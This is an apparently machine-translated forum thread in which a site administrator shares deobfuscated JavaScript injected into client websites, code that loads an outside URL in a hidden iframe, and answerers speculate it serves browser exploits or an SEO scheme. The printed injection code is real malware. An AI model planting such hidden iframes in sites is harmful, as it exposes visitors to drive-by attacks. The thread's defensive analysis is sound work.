我最近在一些客户网站上发现了一些恶意代码。这些片段基于PHP和基于JS并且因为特洛伊木马病毒记录了一些ftp-credentials而被注入。但是,代码被混淆了,当我(安全地)评估它时,它看起来像这样:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src','http://www.bahnmotive.de/index.htm');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
如您所见,URL bahnmotive.de包含在页面中,与隐形iframe一样。这个网站不包含任何有害数据(至少今天不再存在),所以我问自己(和你):为什么有人在一个看不见的iframe中链接到一个网站而不做其他一些邪恶的事情?我的第一个猜测是,有一个SEO机构承诺在他们的客户网站bahnmotive.de上有很多流量,并因为这种木马病毒而完成了。 可能是吗?我在谷歌做了一项研究,但没有发现这一点,所以我想在这里询问一些专业人士。也许你可以指出我可以讨论这个主题的另一个论坛。
答案 0 :(得分:2)
用户代理和插件的存在可能会在该网址上进行检查,并且仅向具有易受攻击的浏览器的用户发送利用。
不要低估坏人。
答案 1 :(得分:0)
漏洞利用可能是:
它可能不是这样的利用 - 正如你在问题中提到的那样它可能是一种推动流量的SEO方案。这可能不会恶意影响你,但仍然是妥协,并且应该清理JS,以防它按照上述3种可能性发展。
答案 2 :(得分:0)
该提交也可能是一个扫描仪,网站无法正确验证字符串数据。这些信息可以在后来的真实攻击中使用,正如其他人所说的那样。
答案 3 :(得分:0)
网页很可能会嗅探HTTP_REFERER,以确保用户来自某个链接,以掩饰其他外部人员的攻击。</ p>
其他考虑因素: